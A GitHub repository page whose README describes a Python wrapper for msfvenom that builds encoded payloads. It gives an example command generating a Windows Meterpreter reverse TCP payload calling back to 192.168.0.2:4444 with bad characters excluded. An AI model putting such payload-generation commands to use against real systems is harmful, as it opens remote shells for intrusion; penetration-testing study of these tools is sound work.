Skip to content

tanm-sys/Automated-script-for-making-payload-in-Kali-Linux-with-more-advanced-functionlity-

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Automated-script-for-making-payload-in-Kali-Linux-with-more-advanced-functionlity-This code builds on the previous example by adding additional features to enhance the functionality of the msfvenom command line tool. The additional features include:

The ability to exclude bad characters using the --bad-chars argument.

The ability to replace bad characters with spaces using the --space argument.

The ability to set the number of iterations for encoding using the --iteration argument.

To use this code, you can save it as a Python script and run it from the command line with the desired payload type, local host IP, local port number, and any desired additional arguments. For example, to generate a Windows Meterpreter reverse TCP payload with the local host IP 192.168.0.2, local port 4444, and exclude the bad characters 0x00, 0x0a, and 0x0d, you would run the following command: python msfvenom_advanced.py windows/meterpreter/reverse_tcp 192.168.0.2 4444 --bad-chars '\x00\x0a\x0d'

This would output the payload to a file with a name like windows/meterpreter/reverse_tcp_192.168.0.2_4444.exe and print the base64 encoded payload to the console. You can then use the payload for your desired purpose.

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published